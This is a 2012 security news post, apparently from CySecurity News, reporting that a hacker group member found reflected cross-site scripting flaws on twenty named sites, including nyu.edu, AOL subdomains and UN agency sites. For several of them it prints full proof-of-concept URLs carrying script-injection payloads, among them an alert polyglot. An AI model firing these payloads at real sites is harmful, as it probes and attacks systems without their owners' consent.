XSS vulnerability found in 20 High profile sites by GOH group

April 25, 2012

XSS vulnerability found in 20 High profile sites by GOH group

An Indian ethical hacker named Akshay AKA 0z0n3 beloging to the hacking crew called GOH (godofhackers) has found 20 high profiled sites vulnerable to non-persistant xss attacks.

The list of Vulnerable site with their Screenshots:

1. nyu.edu - vunl link - http://www.nyu.edu/search.html?search=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/33v2hkz.png

2. barclays.co.uk - snap - http://i46.tinypic.com/wrhlp4.png status - patched

3. pakistanstockexchange.com - vunl link - http://pakstockexchange.com/stock2/index_new.php?section=research&page=company_chooser_new&keyword=\%27;alert%28String.fromCharCode%2888,83,83%29%29//\\\%27;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//\\\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E\%22%3E\%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E snap - http://i49.tinypic.com/16huvi9.png

4. lilwaynehq.com- official site of lil wayne - vunl link - http://www.lilwaynehq.com/?s=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%20by%200z0n3%20of%20.::[GOH]::.%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i50.tinypic.com/zugubs.png

5.mercury-pc.com - vunl link - http://www.mercury-pc.com/search.php snap - http://i48.tinypic.com/b624qa.png

6.transcend.com - vunl link - http://www.transcend-info.com/Support/Search/index.asp snap - http://i47.tinypic.com/28letjc.png

7.bangladeshtradeinfo.com - vunl link - http://www.bdtradeinfo.com//yellowpages/search.asp?search=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E snap - http://i49.tinypic.com/dzc68.png

8.defense.aol.com - vunllink - http://defense.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i49.tinypic.com/6fpgeq.png

9.gov.aol.com - vunllink - http://gov.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i47.tinypic.com/f0n59x.png

10.http://www.unicc.org/ - http://i39.tinypic.com/352iycw.png

11.http://www.un.org.au - http://i44.tinypic.com/critx.jpg

12.http://unfccc.int - http://i40.tinypic.com/e0qrdf.png

13.http://search2.unaids.org - http://i43.tinypic.com/4gruww.png

14.http://unu.edu - http://i39.tinypic.com/v8odw9.png

15.http://www.unpri.org - http://i41.tinypic.com/20pegsj.png

16.http://www.uneval.org - http://i50.tinypic.com/2w3t2lz.png

17. http://www.unscn.org - http://i49.tinypic.com/11ugo76.jpg

18.http://www.undg.org - http://i45.tinypic.com/2zp2s6v.png

19.http://www.alienwarearena.com/ - http://i47.tinypic.com/vzbwif.png

20.www.games.com - aolsubdomain - http://i47.tinypic.com/33z9v8m.png

Search This Blog

CySecurity News - Latest Information Security and Hacking Incidents

XSS vulnerability found in 20 High profile sites by GOH group

Popular Posts

Teen Hacking Suspect Arrested by London Police for GTA 6 and Uber Breach

BIND Updates Patch High-Severity Flaws